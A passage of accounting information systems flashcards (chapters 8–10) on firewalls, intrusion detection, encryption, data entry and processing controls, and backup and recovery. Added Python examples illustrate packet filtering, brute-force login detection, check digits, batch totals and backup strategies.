specifies the structure of packets and how to route them to the proper destination. |
|
|
Term
Ch. 8
routers |
Definition
designed to read the destination address fields in IP packet headers to decide where to send the packet next. |
|
|
Term
Ch. 8
access control list |
|
Definition
set of rules that determines which packets are allowed entry and which are dropped |
|
|
Term
Ch. 8
static packet filtering |
|
Definition
performed by border routers; screens each IP packet on its own, based solely on the source and/or destination fields in the IP packet header, with no memory of earlier packets |
|
|
Term
Ch. 8
stateful packet filtering |
|
Definition
creates and maintains a table in memory that lists all established connections between the org’s computers and the internet |
|
|
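Added example (not from the textbook or this card set): the access control list, static packet filtering and stateful packet filtering cards as one small Python model. A static filter judges each packet by its header against an ordered ACL; the stateful filter adds a connection table so replies to connections opened from inside are admitted while unsolicited inbound packets are not. The addresses, ports and rules are constructed for this illustration.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    direction: str  # "in" = arriving from the Internet, "out" = leaving the LAN


# Constructed static ACL (not from the page); first matching rule wins.
# Fields: direction, source network, destination network, dest port (None = any), action.
ACL = [
    ("in",  "0.0.0.0/0",  "10.0.0.5/32", 443,  "allow"),  # public HTTPS server in the DMZ
    ("out", "10.0.0.0/8", "0.0.0.0/0",   None, "allow"),  # LAN hosts may initiate anything
    ("in",  "0.0.0.0/0",  "0.0.0.0/0",   None, "deny"),   # default deny for other inbound traffic
]


def _matches(rule, pkt: Packet) -> bool:
    direction, src_net, dst_net, dport, _ = rule
    return (
        direction == pkt.direction
        and ipaddress.ip_address(pkt.src) in ipaddress.ip_network(src_net)
        and ipaddress.ip_address(pkt.dst) in ipaddress.ip_network(dst_net)
        and (dport is None or dport == pkt.dport)
    )


def static_filter(acl, pkt: Packet) -> str:
    # Static packet filtering: each packet is judged on its own header fields.
    for rule in acl:
        if _matches(rule, pkt):
            return rule[4]
    return "deny"  # implicit default deny if no rule matched


class StatefulFilter:
    """Stateful packet filtering: remembers connections that LAN hosts opened
    so that only their replies are let back in."""

    def __init__(self, acl):
        self.acl = acl
        self.connections = set()  # (lan_host, lan_port, remote_host, remote_port)

    def filter(self, pkt: Packet) -> str:
        if pkt.direction == "in" and (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.connections:
            return "allow"  # reply to a connection a LAN host established
        decision = static_filter(self.acl, pkt)
        if decision == "allow" and pkt.direction == "out":
            self.connections.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
        return decision
```

The static filter has no way to tell a reply to a browser's request from an attacker's probe aimed at the same port, so it must either deny the reply (breaking the session) or open a standing hole; the connection table resolves that, which is why stateful filtering is the baseline for firewalls.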
Term
Ch. 8
deep packet inspection |
|
Definition
the process of examining the data contents (payload) of a packet rather than only its header addresses and ports; catches attacks hidden in permitted traffic but costs throughput, since every packet body must be inspected |
|
|
Term
Ch. 8
intrusion prevention systems |
|
Definition
monitors patterns in the traffic flow, rather than only inspecting individual packets, to identify and automatically block attacks. |
|
|
Term
Ch. 8
Remote Authentication Dial-In User Service (RADIUS) |
Definition
verifies the identity of users attempting to obtain dial-in access (for securing dial-up connections) |
|
|
Term
Ch. 8
war dialing |
Definition
software that calls every telephone number assigned to an org and identifies those which are connected to modems. |
|
|
Term
Ch. 8
hardening |
Definition
the process of modifying the default configuration of endpoints to eliminate unnecessary settings and services |
|
|
Term
Ch. 8
detective controls |
Definition
- log analysis
- intrusion detection systems
- managerial reports
- security testing
|
|
|
Term
Ch. 8
intrusion detection system |
|
Definition
set of sensors and a central monitoring unit that create logs of network traffic that was permitted to pass the firewall and then analyze those logs for signs of attempted or successful intrusion. |
|
|
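Added example (not from the textbook or this card set): the log analysis and intrusion detection cards applied to a few constructed SSH authentication log lines. The parser extracts time, result, user and source IP; the detector flags a burst of failed logins from one address and, more importantly, a success from that address right after the burst. The log format, threshold and window are assumptions for this illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines in a syslog-like format (not real captures).
SAMPLE_LOG = """\
2024-03-01T08:00:01 sshd[101]: Failed password for admin from 203.0.113.7 port 50111
2024-03-01T08:00:03 sshd[101]: Failed password for admin from 203.0.113.7 port 50112
2024-03-01T08:00:04 sshd[101]: Failed password for root from 203.0.113.7 port 50113
2024-03-01T08:00:06 sshd[101]: Failed password for admin from 203.0.113.7 port 50114
2024-03-01T08:00:09 sshd[101]: Failed password for admin from 203.0.113.7 port 50115
2024-03-01T08:00:12 sshd[101]: Accepted password for admin from 203.0.113.7 port 50116
2024-03-01T08:05:00 sshd[101]: Failed password for alice from 10.0.0.21 port 40000
2024-03-01T08:05:30 sshd[101]: Accepted password for alice from 10.0.0.21 port 40001
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for (?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+$"
)


def parse(log_text: str):
    """Turn raw lines into (timestamp, result, user, ip) events; skip lines that
    do not match, as a real log is full of unrelated messages."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, threshold: int = 5, window: timedelta = timedelta(minutes=1)):
    """Alert when an IP accumulates `threshold` failures inside `window`, and
    again if that IP then succeeds: one typo is noise, a success after a burst
    of failures is the signature of a guessed password."""
    failures = defaultdict(list)
    alerts = []
    for ts, result, user, ip in events:
        if result == "Failed":
            # Keep only failures still inside the sliding window, then add this one.
            failures[ip] = [t for t in failures[ip] if ts - t <= window] + [ts]
            if len(failures[ip]) == threshold:
                alerts.append({"ip": ip, "kind": "bruteforce", "at": ts})
        elif result == "Accepted" and len(failures[ip]) >= threshold:
            alerts.append({"ip": ip, "kind": "success_after_bruteforce", "user": user, "at": ts})
            failures[ip] = []
    return alerts
```

The second alert kind is what turns a detective control into a corrective one: it is the event that should page the incident response team and trigger containment (lock the account, block the address) rather than just a line in a daily report.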
Term
Ch. 8
penetration testing |
|
Definition
an authorized attempt by either an internal audit team or an external security consulting firm to break into the org’s info system |
|
|
Term
Ch. 8
Corrective Controls |
|
Definition
- computer incident response team
- chief info security officer
- patch management
|
|
|
Term
Ch. 8
Computer incident response team |
|
Definition
responsible for dealing with major incidents; the response should go through 4 steps:
- recognition
- containment
- recovery
- follow-up
|
|
|
Term
Ch. 8
patch management (fine!) |
|
Definition
the process for regularly applying patches and updates to all software used by the org. |
|
|
Term
Ch. 8
virtualization |
Definition
run multiple systems simultaneously on one physical computer |
|
|
Term
Ch. 9
Ways to preserve confidentiality |
|
Definition
- identification and classification of the info to be protected
- encryption of sensitive information
- controlling access to sensitive info
- training
|
|
|
Term
Ch. 9
Information rights management |
|
Definition
software that provides an additional layer of protection to specific info resources, offering the capability not only to limit access to specific files or documents, but also to specify the actions (read, copy, print, forward) that individuals who are granted access to that resource can perform. |
|
|
Term
Ch. 9
data loss prevention software |
|
Definition
works like antivirus programs in reverse, blocking outgoing messages that contain key words or phrases associated with the intellectual property or other sensitive data. |
|
|
Term
|
Definition
embedded code; a detective control that enables an org to identify confidential info that has been disclosed: the company can scan the internet for content carrying its watermark. |
|
|
Term
|
Definition
principle of the Trust Services framework that is closely related to the confidentiality principle, but focuses on protecting personal info about customers rather than organizational data. |
|
|
Term
Ch. 9
GAPP’s 10 internationally recognized best practices for protecting customer info privacy |
|
Definition
- management
- notice
- choice/consent
- collection (cookies)
- use/retention (only as long as it’s needed for a legit business purpose)
- access
- disclosure to third parties
- security
- quality
- monitoring/enforcement
|
|
|
Term
|
Definition
the process of transforming normal content, called plaintext, into unreadable gibberish called ciphertext |
|
|
Term
Ch. 9
factors that influence encryption strength |
|
Definition
- key length
- encryption algorithm
- policies for managing cryptographic keys
|
|
|
Term
Ch. 9
Types of encryption systems |
|
Definition
- Symmetric (uses the same key at both ends to encrypt and decrypt)
- Asymmetric (uses a pair of keys: a public key and a private key)
|
|
|
Term
|
Definition
the process that takes plaintext of any length and transforms it into a short code called a hash. |
|
|
Term
|
Definition
nonrepudiation: how to create a legally binding agreement that cannot be unilaterally repudiated by either party. |
|
|
Term
|
Definition
a hash of a document that is encrypted using the document creator's private key. Provides proof that (1) a copy of a document or file has not been modified, and (2) who created the original version. |
|
|
Term
Ch. 9
digital certificate |
|
Definition
an electronic document that contains an entity’s public key and certifies the identity of the owner of the particular public key. |
|
|
Term
Ch. 9
certificate authority |
|
Definition
org that issues and distributes digital certificates; each certificate carries the CA's digital signature so that anyone can verify the certificate is genuine. |
|
|
Term
Ch. 9
public key infrastructure (PKI) |
|
Definition
the system for issuing pairs of public and private keys and corresponding digital certificates |
|
|
Term
Ch. 9
Virtual Private Networks (VPNs) |
|
Definition
encrypting info while it traverses the internet; provides the functionality of a privately owned secure network without the associated costs of leasing telephone lines, satellites, and other equipment; creates private communication channels, tunnels, which are accessible only to those parties possessing the appropriate encryption and decryption keys; also contain controls to authenticate the parties exchanging information and to create an audit trail so it satisfies COBIT controls. |
|
|
Term
|
Definition
- forms design (pre-numbered, turnaround docs)
- cancellation and storage of source documents
- data entry controls
- additional batch processing data entry controls
- additional online data entry controls
|
|
|
Term
|
Definition
compares the ID code or account number in transaction data with similar data in the master file to verify that the account exists |
|
|
Term
Ch. 10
reasonableness test |
|
Definition
determines the correctness of the logical relationship between two data items. |
|
|
Term
|
Definition
a digit computed from the other digits of an ID number and appended to it; when the number is entered, the system recomputes the check digit and rejects the entry if it does not match, catching transposed or mistyped digits. |
|
|
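Worked example (added here; not code from the original cards or the textbook) covering the validity check, reasonableness test and check digit cards together: a small input-validation routine for a sales transaction. The check digit is computed with the Luhn (mod-10) algorithm, one common way of deriving a digit from the others; the master files, the +/-20% price band and the transactions are assumptions for illustration.

```python
"""Data entry controls: check digit, validity check and reasonableness test.

Added example (not from the original flashcards). The master files and
transactions are constructed; the check digit uses the Luhn (mod-10)
algorithm, one common way of computing a check digit from the other digits.
"""


def luhn_check_digit(partial: str) -> int:
    """Compute the mod-10 check digit for the digits of `partial`."""
    total = 0
    # walk from the right: the digit nearest the (future) check digit is doubled
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


def check_digit_ok(number: str) -> bool:
    """True if the last digit of `number` is the correct check digit for the rest."""
    return number.isdigit() and len(number) > 1 and luhn_check_digit(number[:-1]) == int(number[-1])


# Constructed master files. Account numbers end in a Luhn check digit.
CUSTOMER_MASTER = {"12345674": "Acme Ltd", "55512123": "Globex Corp"}
ITEM_MASTER = {"WIDGET": 25.00, "GADGET": 120.00}  # item code -> list price


def validate_sale(txn: dict) -> list:
    """Apply the three controls to one sales transaction; return the errors found."""
    errors = []
    acct = txn["account"]
    if not check_digit_ok(acct):
        # check digit: the number was mistyped (transposed or wrong digit)
        errors.append("check digit: account number fails check digit test")
    elif acct not in CUSTOMER_MASTER:
        # validity check: well-formed number, but no such account in the master file
        errors.append("validity check: account not found in customer master file")

    item = txn["item"]
    if item not in ITEM_MASTER:
        errors.append("validity check: item code not found in item master file")
    else:
        # reasonableness test: the entered unit price must bear a sensible
        # relationship to the item's list price (assumed band: within +/-20%)
        list_price = ITEM_MASTER[item]
        if not 0.8 * list_price <= txn["unit_price"] <= 1.2 * list_price:
            errors.append("reasonableness test: unit price out of line with item list price")
    if txn["quantity"] <= 0:
        errors.append("reasonableness test: quantity must be positive")
    return errors
```

Note the order: the check digit is tested first, because a mistyped number that happens to exist in the master file would pass a validity check and post to the wrong customer.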
Term
Ch. 10
three types of batch totals |
|
Definition
- financial
- hash
- record count
|
|
|
Term
Ch. 10
online data entry controls |
|
Definition
- prompting
- closed-loop verification (displays related information about the input, such as the customer name for an entered account number, so the user can confirm it)
- transaction log
|
|
|
Term
Ch. 10
Processing Controls |
|
Definition
- data matching
- file labels (header/trailer records)
- recalculation of batch totals
- cross-footing and zero-balance tests
- write-protection mechanisms
- concurrent update controls
|
|
|
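Worked example (added here; not code from the original cards or the textbook) covering the batch totals card and the processing controls card together: batch totals are prepared at input, recalculated after posting, and compared; a report is cross-footed; a journal is given a zero-balance test. The batch of receipts, the master file, the regional report and the journal entries are constructed for illustration, and the missing master-file account is deliberate so that a dropped record is visible.

```python
"""Batch totals and processing controls: prepare totals at input, recalculate
after processing, cross-foot a report and run a zero-balance test.

Added example (not from the original flashcards). The batch of cash receipts,
the regional sales report and the journal entries are constructed.
"""


def batch_totals(records: list) -> dict:
    """The three batch totals over a list of {'account': str, 'amount': float}."""
    return {
        "financial": round(sum(r["amount"] for r in records), 2),  # sum of a monetary field
        "hash": sum(int(r["account"]) for r in records),            # sum of a non-monetary field
        "count": len(records),                                      # number of records
    }


def post_batch(records: list, master: dict) -> list:
    """Post receipts against customer balances; return the records actually posted."""
    posted = []
    for r in records:
        if r["account"] in master:          # an unknown account silently falls out
            master[r["account"]] -= r["amount"]
            posted.append(r)
    return posted


def mismatched_totals(before: dict, after: dict) -> list:
    """Recalculate-and-compare: names of the batch totals that no longer agree."""
    return [k for k in before if before[k] != after[k]]


def cross_foot(rows: list, column_totals: dict) -> bool:
    """Cross-footing: each row's stored total equals the sum of its cells, each
    stored column total equals the sum down that column, and the grand total
    agrees whether computed from row totals or from column totals."""
    cols = [c for c in column_totals if c != "total"]
    for r in rows:
        if sum(r[c] for c in cols) != r["total"]:
            return False
    for c in cols:
        if sum(r[c] for r in rows) != column_totals[c]:
            return False
    return sum(r["total"] for r in rows) == sum(column_totals[c] for c in cols) == column_totals["total"]


def zero_balance(entries: list) -> bool:
    """Zero-balance test: debits minus credits over a journal must net to zero."""
    return round(sum(e["debit"] - e["credit"] for e in entries), 2) == 0.0


def demo() -> dict:
    # Batch of cash receipts keyed in by data entry, with batch totals prepared first.
    batch = [{"account": "1001", "amount": 250.00},
             {"account": "1002", "amount": 75.50},
             {"account": "1003", "amount": 120.00}]
    master = {"1001": 1000.00, "1002": 500.00}   # 1003 was never set up: it will fall out
    control = batch_totals(batch)
    posted = post_batch(batch, master)
    mismatched = mismatched_totals(control, batch_totals(posted))

    report = [{"region": "North", "widgets": 100, "gadgets": 50, "total": 150},
              {"region": "South", "widgets": 80, "gadgets": 20, "total": 100}]
    column_totals = {"widgets": 180, "gadgets": 70, "total": 250}
    journal = [{"debit": 500.00, "credit": 0.00},
               {"debit": 0.00, "credit": 300.00},
               {"debit": 0.00, "credit": 200.00}]
    return {"control_totals": control,
            "mismatched_totals": mismatched,
            "report_cross_foots": cross_foot(report, column_totals),
            "journal_balances": zero_balance(journal)}
```

All three totals disagree after posting, which tells the operator a record was lost; the hash total in particular identifies which one, since the difference (1003) is the missing account number.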
Term
|
Definition
- user review output
- reconciliation procedures
- external data reconciliation
- data transmission controls (checksums & parity bits)
|
|
|
Term
Ch. 10
batch processing integrity controls |
|
Definition
- prepare batch totals
- deliver the transactions to the computer operations department for processing
- enter the transaction data into the system
- sort and edit the transaction file
- update the master files
- prepare and distribute output
- user review
|
|
|
Term
Ch. 10
ways to minimize risk of system downtime |
|
Definition
- preventive maintenance
- fault tolerance
- data center location and design
- training
- patch management and antivirus software
|
|
|
Term
Ch. 10
ways to have quick and complete recovery and resumption of normal operations |
|
Definition
- backup procedures
- disaster recovery plan
- business continuity plan
|
|
|
Term
|
Definition
use of redundant components so the system can function even if a component fails |
|
|
Term
Ch. 10
redundant arrays of independent drives (RAID) |
|
Definition
several disk drives are written to at once so that the data survives the failure of one drive (fault tolerance) |
|
|
Term
Ch. 10
uninterruptible power supply |
|
Definition
provides protection in the event of a prolonged power outage, using battery power to enable the system to operate long enough to back up critical data and safely shut down. |
|
|
Term
Ch. 10
recovery point objective |
|
Definition
answers the question of how much data a company is willing to recreate from source documents, or how much it is willing to lose; RPO = the maximum amount of data the org is willing to potentially lose. |
|
|
Term
Ch. 10
Recovery time objective |
|
Definition
represents the length of time the org is willing to attempt to function without its info system |
|
|
Term
Ch. 10
incremental backup |
|
Definition
copies only the data items that have changed since the most recent backup, whether that was the full backup or the previous incremental (partial) backup |
|
|
Term
Ch. 10
differential backup |
|
Definition
copies all changes made since the last full backup |
|
|
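Worked example (added here; not code from the original cards or the textbook) covering the incremental and differential backup cards together: a four-day history of a constructed "file system" (a dict of file name to content version), the backup sets each strategy produces, and what a restore of the last day needs in each case. Deleted files are deliberately left out of scope; a real scheme must record deletions as well as changes.

```python
"""Full, incremental and differential backups, and what each restore needs.

Added example (not from the original flashcards). The 'file system' is a
dict of file name -> content version; the daily changes are constructed.
Deleted files are out of scope (a real scheme must record deletions too).
"""
import copy


def take_full(state: dict) -> dict:
    return copy.deepcopy(state)


def changed_since(state: dict, reference: dict) -> dict:
    """Files whose content differs from (or is missing in) the reference snapshot."""
    return {name: content for name, content in state.items() if reference.get(name) != content}


def restore_incremental(full: dict, incrementals: list) -> dict:
    """Full backup plus every incremental since it, applied in order."""
    result = dict(full)
    for inc in incrementals:
        result.update(inc)
    return result


def restore_differential(full: dict, differential: dict) -> dict:
    """Full backup plus only the most recent differential."""
    result = dict(full)
    result.update(differential)
    return result


def simulate(daily_states: list) -> dict:
    """daily_states[0] is the state when the full backup is taken; each later
    entry is the state at the end of the next day. Returns both backup chains
    and what a restore of the final day needs under each strategy."""
    full = take_full(daily_states[0])
    last_backup_state = daily_states[0]  # what the most recent backup (of any kind) saw
    incrementals, differentials = [], []
    for state in daily_states[1:]:
        incrementals.append(changed_since(state, last_backup_state))  # delta from last backup
        differentials.append(changed_since(state, full))              # delta from the full
        last_backup_state = state
    return {
        "incrementals": incrementals,
        "differentials": differentials,
        "restore_incremental": restore_incremental(full, incrementals),
        "restore_differential": restore_differential(full, differentials[-1]),
        "sets_needed_incremental": 1 + len(incrementals),  # the full plus every incremental
        "sets_needed_differential": 2,                     # the full plus the last differential
    }


# Constructed four-day history: full backup on day 0, then three days of changes.
HISTORY = [
    {"ledger.db": "v1", "payroll.csv": "v1", "notes.txt": "v1"},                      # day 0 (full)
    {"ledger.db": "v2", "payroll.csv": "v1", "notes.txt": "v1"},                      # day 1
    {"ledger.db": "v2", "payroll.csv": "v2", "notes.txt": "v1"},                      # day 2
    {"ledger.db": "v3", "payroll.csv": "v2", "notes.txt": "v1", "memo.docx": "v1"},   # day 3
]
```

The trade-off the two cards describe falls out of the output: each incremental is small, but a restore needs the full backup plus every incremental in order (four sets here), so losing one breaks the chain; each differential grows day by day, but a restore needs only the full backup and the latest differential.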
Term
|
Definition
copy of a database, master file, or software that’s retained indefinitely as an historical record, usually to satisfy legal and regulatory requirements; not usually encrypted. |
|
|
Term
Ch. 10
Disaster recovery plan |
|
Definition
outlines the procedures to restore an org’s IT function in the event that its data center is destroyed. |
|
|
Term
|
Definition
facility that is prewired for phone and internet access and also has all the computing and office equipment the org needs to perform its essential business activities |
|
|
Term
Ch. 10
business continuity plan |
|
Definition
specifies how to resume not only IT operations, but all business processes, including relocating to new offices and hiring temporary replacements |
|
|
Term
|
Definition
the formal process used to ensure that modifications to hardware, software, or processes do not reduce systems reliability; careful testing ensures less downtime; good documentation provides better trouble-shooting |
|
|
Term
|
Definition
- all change requests should be standard and documented
- all changes should be approved by appropriate levels of mgmt
- changes should be thoroughly tested prior to implementation
- all documentation should be updated to reflect authorized changes
- emergency changes must be documented and subjected to a formal review/approval
- backout plans need to be developed for reverting to previous config in case approved changes need to be interrupted or abandoned
- user rights and privileges must be carefully monitored during the change process to ensure that proper segregation of duties is maintained.
|
|
|